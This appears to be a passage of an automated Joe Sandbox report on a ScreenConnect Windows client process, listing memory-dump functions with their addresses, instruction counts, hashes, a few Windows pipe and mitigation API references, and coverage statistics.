Instruction ID: 61c11fd40cb49408af9579cbbda810ea463663bfc1e7a61f3f76756f05dffc27
Opcode Fuzzy Hash: a0b439fc7168e9a03b9e824f39ac587fcb3e81b7181e4875e6c56c947b483415
Instruction Fuzzy Hash: 93C08C34301001AB8204DB84E680CA0FB26EFC2268328C0ADDC0C4B302DA23EC0387C0

Function 042D5A98 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11bf0c410a149424d1e737ab6ee0fca02f34da5ce37533a752067f597f78b082
Instruction ID: 8ac409ec111efa85a7b080307edbabd7cb9dd1badb70e151ab45cb17c0681af1
Opcode Fuzzy Hash: 11bf0c410a149424d1e737ab6ee0fca02f34da5ce37533a752067f597f78b082
Instruction Fuzzy Hash: EFC08C317201219BCB008A18E9046A273E9DFC8200719C0B9A80AE770ADA7AEC838684

Function 042DFBD0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc0d726e2bdae9c8a23f76e401cd036cb75e3626a1cb4528f87485ad0b200e05
Instruction ID: 81efb3665ea4d15a6bd82b6fb44b18338e20334a7cf517b16a19ec7c18f7e70c
Opcode Fuzzy Hash: fc0d726e2bdae9c8a23f76e401cd036cb75e3626a1cb4528f87485ad0b200e05
Instruction Fuzzy Hash: 2EC01232140308EBCB058F90D801E9A372AAF58700F608058FA080E250C733E8A2EBA0

Function 042DE340 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd838e53bd1ab9d09d598d263e507d0caef7987edb094282f40250ad84ac6911
Instruction ID: ff004d6b1bb052d413178d6ad5285e248fd76d6a21d0db761bdb3017f9b01449
Opcode Fuzzy Hash: dd838e53bd1ab9d09d598d263e507d0caef7987edb094282f40250ad84ac6911
Instruction Fuzzy Hash: 06C08CF20040404BD780DA24CC92748B320DF40230F298798D8284A3D1EA2ADA039A80

Function 042DDB30 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d76ca5c63bbde11cdd7af0ff93312952be6d8a11279592a95bf5543901ac545a
Instruction ID: 7f89b0a07c4adf9f52ef7556491e894106e49cadcc5180f4567c2ee55a86fa1e
Opcode Fuzzy Hash: d76ca5c63bbde11cdd7af0ff93312952be6d8a11279592a95bf5543901ac545a
Instruction Fuzzy Hash: ADC09B5E15F9C11FDF5717F1CD963C62E3096524187DC44D74048C6793E409C6494B85

Function 042DC62C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba49020fafa6db85300d7886dad0749224f969f8a1f000df15cb99d61c65e90a
Instruction ID: f82b35f4a7bd7e803eeebd851b955d897d1abbb1dda96f18f637abe075d05749
Opcode Fuzzy Hash: ba49020fafa6db85300d7886dad0749224f969f8a1f000df15cb99d61c65e90a
Instruction Fuzzy Hash: 97C04C342191809FC205CB64C5A1520BF619F87114318C4C9D4854F253CA23EC03D790

Function 042DFEF0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 109501ece3e18c269e58e07650298fe7127e7fcf7e8eb5a1b543274c9fb616bc
Instruction ID: a857ba81bb14204750c77b912bc908f5b67d7b672e9be9ab3f9135ae79a8a0af
Opcode Fuzzy Hash: 109501ece3e18c269e58e07650298fe7127e7fcf7e8eb5a1b543274c9fb616bc
Instruction Fuzzy Hash: FFC09276180208EFC700DF59D844C857BB8EF2977170140A1FA088B332C732ECA1DA94

Function 042DA423 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5c6e9dc776f5c38b0ff59a44198a4a397c9a3af10b2e6d54b5b77a327912950
Instruction ID: 3d7e6dc2fd8c09b2735242914816042d18f9947269b8bd6c460af476fa1bdfe8
Opcode Fuzzy Hash: b5c6e9dc776f5c38b0ff59a44198a4a397c9a3af10b2e6d54b5b77a327912950
Instruction Fuzzy Hash: BAB012B3641A01AFD7009780DE05B167B12DBA0712F0984327246409A6C3355011E616

Analysis Process: ScreenConnect.WindowsClient.exePID: 5900, Parent PID: 1012COMMON

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	27.3%
Total number of Nodes:	11
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFD9B8C5835 Relevance: 1.7, APIs: 1, Instructions: 202
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeW.KERNELBASE ref: 00007FFD9B8C5983

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c3000_ScreenConnect.jbxd

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
Opcode ID: fb951b23b6376b342a6a91d17ed92c3d7861eec21d97fbf0c50635f6ab4dba67
Instruction ID: 8c2cdf3348e71ff945ea3ce76dce47d0b9352fc173026753d6de90b077ec178f
Opcode Fuzzy Hash: fb951b23b6376b342a6a91d17ed92c3d7861eec21d97fbf0c50635f6ab4dba67
Instruction Fuzzy Hash: 4E51D37191CA5C8FDB68EF5898157E97BE0FB59710F0542AFD04DD3252CB34A9418BC2

Function 00007FFD9BBB000A Relevance: 1.1, Instructions: 1133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20b45cd4e053f167442dac3439d98d6362cb58cabc37d10a7b899b6a181a566
Instruction ID: 0b96c6a4f468593893547b81d5278ecc0890a115ac79c3a25bf766af775091d0
Opcode Fuzzy Hash: b20b45cd4e053f167442dac3439d98d6362cb58cabc37d10a7b899b6a181a566
Instruction Fuzzy Hash: D0727D62B0F7AA4FE76A97AC94745F63B90FF55718B4900F7D089CB1E3EC18A9068740

Function 00007FFD9BBB6E7C Relevance: .6, Instructions: 594COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 904a14b931c8d70b4af1c24d2253c707a68625d529b35c4c30cee9c80f235e64
Instruction ID: fcc41aa5077f55b448369f3ffd597b9f81321c6fe104a932d58fd2c7653bee03
Opcode Fuzzy Hash: 904a14b931c8d70b4af1c24d2253c707a68625d529b35c4c30cee9c80f235e64
Instruction Fuzzy Hash: 7012FA32B1ED2E4FEBB997A984706BA72D2FF98344F564079D04DC31E2DD28B9068750

Function 00007FFD9BBB5C21 Relevance: .6, Instructions: 561COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff13fdea40e48bfdf3c458ae2d4ebde1f0c175284a0b40be371b508c5e01bc0c
Instruction ID: b628725618b3f90d6207dcdea5e5e35f57f2a1482eef72775416c0ed3a0c6b38
Opcode Fuzzy Hash: ff13fdea40e48bfdf3c458ae2d4ebde1f0c175284a0b40be371b508c5e01bc0c
Instruction Fuzzy Hash: 62027A21B0EA6F4FEB759A5854B12B677C1FF54308F4501B9C45EC71E7DD28AD028741

Function 00007FFD9B8B052F Relevance: 3.0, Strings: 2, Instructions: 537
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L_^^, xrefs: 00007FFD9B8B06C9
?L_I, xrefs: 00007FFD9B8B0804

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID: ?L_I$L_^^
API String ID: 0-3203466512
Opcode ID: 3837bdaaadbc38f9742122be220e578ceee0ea1b3af54f82e6b1140a54022d98
Instruction ID: b80a57dc80cada65caa1fb5a195ea65f7792b5608dcd59b8bbd260f81b31a0b6
Opcode Fuzzy Hash: 3837bdaaadbc38f9742122be220e578ceee0ea1b3af54f82e6b1140a54022d98
Instruction Fuzzy Hash: EAD17A1371EAA64AD76667FD7C660F83B90EFC53B131541BBD088C70A7E805A80787D2

Function 00007FFD9B8AEE0D Relevance: 3.0, Strings: 2, Instructions: 526
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UL_^, xrefs: 00007FFD9B8AEF01
_, xrefs: 00007FFD9B8AF23C

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID: UL_^$_
API String ID: 0-2415016994
Opcode ID: 708f86a75c226c44b2b86626651ee29ecb35e605cdafe7470619679158bc3249
Instruction ID: b28380bb3c4cfa0357a156285aee0b14dccf79bcaa8e17565b153438c5fc7273
Opcode Fuzzy Hash: 708f86a75c226c44b2b86626651ee29ecb35e605cdafe7470619679158bc3249
Instruction Fuzzy Hash: B2E13B53B0F6960BE326A7BCBCB64F53B60DF4266570942F7D0988B0E7ED18650782A1

Function 00007FFD9B8A8014 Relevance: 1.7, APIs: 1, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B8A8142

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8a3000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 65bed509957b13458f1ce6c7e3d01f848c11b42af306129c62baf52a94d9ac59
Instruction ID: 405f20167fad445eea1326e9242622b29d925e16992375463adf450b9002a785
Opcode Fuzzy Hash: 65bed509957b13458f1ce6c7e3d01f848c11b42af306129c62baf52a94d9ac59
Instruction Fuzzy Hash: 93414B31D0DB584FDB28AFA8984A5E97BE0EF59310F04017FE449C3192DF78A946CBA1

Function 00007FFD9B8ABAF3 Relevance: 1.7, Strings: 1, Instructions: 427
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L, xrefs: 00007FFD9B8ABB3C

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: 36cea8d457a0c504a6ff029433d91b3fea38503fe812d576501c416b57677558
Instruction ID: e9d432f759aa07e48f98c6d8cb058d4ec364d779132ef2ba28620a26c3e23fc6
Opcode Fuzzy Hash: 36cea8d457a0c504a6ff029433d91b3fea38503fe812d576501c416b57677558
Instruction Fuzzy Hash: 50C17931B0DA4E4FEBA9DB2C88656B577E1EF98300F0541BAD04CC72E6DE24AC028781

Function 00007FFD9B8C5D95 Relevance: 1.6, APIs: 1, Instructions: 142
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConnectNamedPipe.KERNELBASE ref: 00007FFD9B8C5E6F

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c3000_ScreenConnect.jbxd

Similarity

API ID: ConnectNamedPipe
String ID:
API String ID: 2191148154-0
Opcode ID: a2db7fb6db1229bc33294028b8fd728a5eef223e167412b6ae87da093ddbb1b3
Instruction ID: 45129b40ac67aefab9c96771e1dc8cbeeeaf96ff46ddfdc040f17786021aec5f
Opcode Fuzzy Hash: a2db7fb6db1229bc33294028b8fd728a5eef223e167412b6ae87da093ddbb1b3
Instruction Fuzzy Hash: E041D370A0865C8FDB58EF98C859AE9BBF0FF55310F0082ABD048D7256DB34A845CB81

Function 00007FFD9B8AB61A Relevance: 1.4, Strings: 1, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

R_H, xrefs: 00007FFD9B8AB790

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID: R_H
API String ID: 0-21197713
Opcode ID: 6c16baa0a3728764ea72e04e4ce4a21c771f8b579f87d6e0041d3ca48f114e8d
Instruction ID: 13672d7f12595d9ecd608b69a87ab4fc685eced5e4c10b86a6d06ebb1904f73c
Opcode Fuzzy Hash: 6c16baa0a3728764ea72e04e4ce4a21c771f8b579f87d6e0041d3ca48f114e8d
Instruction Fuzzy Hash: 5F510472B0ED4D4FEBA8EB5C98766B873D1EF99340B0501B9E44DD32E2ED15AD028340

Function 00007FFD9B8AE2A2 Relevance: 1.4, Strings: 1, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

AL_L, xrefs: 00007FFD9B8AE36D

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID: AL_L
API String ID: 0-958781632
Opcode ID: 664990fe1c8d925e124acc6e3a0997ab819f47262635c57f8bfeae82fd258fc4
Instruction ID: 1423ef8aeb159d222b593f9fd961f4c6efacb4f861cc126493f5ebd84441fd75
Opcode Fuzzy Hash: 664990fe1c8d925e124acc6e3a0997ab819f47262635c57f8bfeae82fd258fc4
Instruction Fuzzy Hash: AB416A72B1ED8A0FE76CE79CA8655B877D1EF9834172444BAD05DC35E6ED10B9034381

Function 00007FFD9B8AE309 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

AL_L, xrefs: 00007FFD9B8AE36D

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID: AL_L
API String ID: 0-958781632
Opcode ID: 10c04825b35f1bc9e6036d6e7ea265282f7f86a7dfd2aa67207bcc31642bed04
Instruction ID: d1ec628b99ba0a8d51c4860e23e2593575a36a87ede0e40dec8c0a7abde2e3c4
Opcode Fuzzy Hash: 10c04825b35f1bc9e6036d6e7ea265282f7f86a7dfd2aa67207bcc31642bed04
Instruction Fuzzy Hash: 0D316C72B29D8B4BE76CFBAC94A55B573D2FFA834171144B9D05AC35E6ED20BC024380

Function 00007FFD9B8AA3C5 Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f589cad351aeaabe29817174053937abe21bef1f58c9171065af89b36f1ac13a
Instruction ID: 5835603dd27f1f29e18f149b84bf17afa7a187b26a2fa4ed32805a19e3cac89f
Opcode Fuzzy Hash: f589cad351aeaabe29817174053937abe21bef1f58c9171065af89b36f1ac13a
Instruction Fuzzy Hash: A8D11471709A8E4FDB99EF689865AE537A0FF58318B0441BAD46DC7297EE34E802C740

Function 00007FFD9B8AF705 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 656d558f4a1e43f55b06154d3d2bf3c21b34126639deea2c0df5f394f895a7d8
Instruction ID: cf7c210c868f380805fb8b140d371db62646addb15543060eafdadce96688f1e
Opcode Fuzzy Hash: 656d558f4a1e43f55b06154d3d2bf3c21b34126639deea2c0df5f394f895a7d8
Instruction Fuzzy Hash: 6FA1A171719A4D8FDFD8EF28C4A46A537A2FF9D304B1502ADD419C76A6DB31E802CB40

Function 00007FFD9B8B01A1 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c81a3779aa93f516ab02913e04356915e9126e2b5d8891b7c24aa11cbe6e2212
Instruction ID: ff7c716de549d343bee6395a3ccfecfc9522dd1a7f1ddd3781226ac6d058bf6c
Opcode Fuzzy Hash: c81a3779aa93f516ab02913e04356915e9126e2b5d8891b7c24aa11cbe6e2212
Instruction Fuzzy Hash: 61917932B2DE4D4FD7A5EB6C98A9A7573D1FF5C700B0501BAD04DC72A6ED19AC018781

Function 00007FFD9BBB4E5C Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a4204111e11ea94f2274dae87b1193cfc2af49969047020d6e4aa86e7128a0
Instruction ID: 627bf055e8e95e7b26c7fd470f7e02517ce23bb92d914de56a127d5c65e52918
Opcode Fuzzy Hash: c3a4204111e11ea94f2274dae87b1193cfc2af49969047020d6e4aa86e7128a0
Instruction Fuzzy Hash: C291C532A0DA1A4FEF68EA58C4A28B673D1FF60354B40053DD45E875D2EE25FA46CBC1

Function 00007FFD9BBB5E34 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eea9bade0b7c868820aea5c24b0bb7f4f75e70b3821e2c82d168f3f39774bb91
Instruction ID: b9ed5f07bbceaaf124f67b7e680e7850ff41a52d1dc2af727fadd7ecf87b6c1d
Opcode Fuzzy Hash: eea9bade0b7c868820aea5c24b0bb7f4f75e70b3821e2c82d168f3f39774bb91
Instruction Fuzzy Hash: 8C813B21B0FBAF4FFB669BA894B15B57791FF45308B0901BAC49DC70E7DD18AD068602

Function 00007FFD9BBB3EFA Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88b80a7be859ce206eeae2ba421d1f22c2712cd4433694ac5d247d8e2a8afa0b
Instruction ID: b67520af59630ca3055eddc2ca5aedb2eb2144b6d9bb608ac7cdb8ff0f70ca09
Opcode Fuzzy Hash: 88b80a7be859ce206eeae2ba421d1f22c2712cd4433694ac5d247d8e2a8afa0b
Instruction Fuzzy Hash: 4E91773470DA4A8FDBDCEF58C0A16A177E2FF5830872445BDC059CB29BCA25E846CB40

Function 00007FFD9B8AF395 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc9ddbd21f16e28d677eee0ffd9ccf0b4873b477c4cf554e6fb398722130b29d
Instruction ID: f97164057f7e5216987b0620e4acf3d8ebb9b67ebf754607a2d1cd7d4b466839
Opcode Fuzzy Hash: bc9ddbd21f16e28d677eee0ffd9ccf0b4873b477c4cf554e6fb398722130b29d
Instruction Fuzzy Hash: 6D817130719A4E8FDF98EF18C4A0AB577E2FF9D304B1546A9D41EC7296DA35E802CB40

Function 00007FFD9BBB6FB8 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d73fb61454680f490579e70556f7df013d31bb09e81d2e5d3a7949c296a0e830
Instruction ID: 2024b121e1a5ea765ec1e52319b030588f337f1846334f28e039219fe8ebbda7
Opcode Fuzzy Hash: d73fb61454680f490579e70556f7df013d31bb09e81d2e5d3a7949c296a0e830
Instruction Fuzzy Hash: 59718B31F1AD2F4AEB75D7A584706BA72D2FF94348F564039D05EC31E1DE28BA428A50

Function 00007FFD9B8AA873 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53b0803a99b8e7f6fadb5a2fa620ca6ae6c3423e03eec021542a19a9bca99bbc
Instruction ID: 7a6e5d26b9849ab2ef553a6aaaf0898bc8d5c7d51550b3243213d97c8b010bd0
Opcode Fuzzy Hash: 53b0803a99b8e7f6fadb5a2fa620ca6ae6c3423e03eec021542a19a9bca99bbc
Instruction Fuzzy Hash: 4A617071719A4D8FDB98DF2888B56A537D2FF5C304F1606A8E46DC72E2DA35E912C700

Function 00007FFD9B8ACCA5 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4d156c882e52e8e51b8c021fc761d90df5ab850c7cee2f735a4669175d53742
Instruction ID: 7284ecfb7730e5da722b18bcced2d5c669922182f4a79685596c8f130cdbb6b8
Opcode Fuzzy Hash: f4d156c882e52e8e51b8c021fc761d90df5ab850c7cee2f735a4669175d53742
Instruction Fuzzy Hash: 6351273171DE4E4FDBA8DB5CC864A6177E1EFA8340B1541FAD04DC71A6EE25EC028791

Function 00007FFD9B8B1685 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f54d2059d4795a9e96edaf08d668980034896e07ae9d8529a320bf68f8737b6
Instruction ID: 8fdd66c8d503a7a9f5a3ed6625655533fd1328cb448a078356009d801a5d1b15
Opcode Fuzzy Hash: 6f54d2059d4795a9e96edaf08d668980034896e07ae9d8529a320bf68f8737b6
Instruction Fuzzy Hash: BD510330729A498FD799EB6CC8A5A6577E1EF5830074541B9D08ACB1A7DE24F842CB81

Function 00007FFD9B8AC1F5 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a35354744c2b69daaa0e25e8b6c81f55c173e48c20b4b99fca409896268c3b94
Instruction ID: dac0f117ff73a86f569667b0900f1f02c62796f4a21f44b18cfac20ce2e60a21
Opcode Fuzzy Hash: a35354744c2b69daaa0e25e8b6c81f55c173e48c20b4b99fca409896268c3b94
Instruction Fuzzy Hash: E751B430719B4E8FDFD8DF68C8A4AA537A1FF69304B1505ADD41ACB2D6CA35E802CB50

Function 00007FFD9BBB275E Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41fa14ca4f386e1d1d53422a1294a455b681c9c82ffa44860e5dcf15cdb99d5f
Instruction ID: 80ae0673ea9ddb18afe41df717b3fab6dc4df0b40f7a1b426b6a983be4e8bc7f
Opcode Fuzzy Hash: 41fa14ca4f386e1d1d53422a1294a455b681c9c82ffa44860e5dcf15cdb99d5f
Instruction Fuzzy Hash: DE51E172709A494FEB98DE68D860AAA37D2FF68314F0501B9D45DC72E6DE25FC02CB40

Function 00007FFD9B8B0D00 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58db13f89555da0dadecc71ea28794eaa6730f53756c45e0d950a8cad07ba801
Instruction ID: e450e023f199e51f1992b960f797dcf86d8e007745299e80a83d78d3d75ee9f8
Opcode Fuzzy Hash: 58db13f89555da0dadecc71ea28794eaa6730f53756c45e0d950a8cad07ba801
Instruction Fuzzy Hash: FF414932B29B2D4FEFA4DBADA4962BD73D1EF9C750B05017AD00DC71A1DE21A8018BC0

Function 00007FFD9BBB856C Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

